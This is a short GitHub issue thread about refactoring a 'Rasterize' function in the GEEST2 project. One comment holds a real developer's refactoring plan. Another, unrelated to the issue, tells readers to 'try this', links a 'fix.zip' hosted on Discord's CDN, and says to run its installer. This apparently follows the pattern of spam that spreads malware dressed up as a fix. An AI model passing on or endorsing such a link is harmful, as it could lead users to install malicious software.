### ISSUE TITLE
`Rasterize 🔴` - Parameters: layer, attribute, output_path, no_data_value=-9999 | Return Type: Not Specified

### ISSUE THREAD

**Issue by timlinux** [kartoza/GEEST2#10]

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by osundwajeff** [comment]
`def Rasterize(self, factor_no)`

Refactoring, modularization (long `if-elf`) and removing geopandas code such `gpd.read_file`.

Remove redundant code (Rasterization settings, CRS reprojections, status updates). 

Error handling.

Logging.

Remove dead code (removed factors)
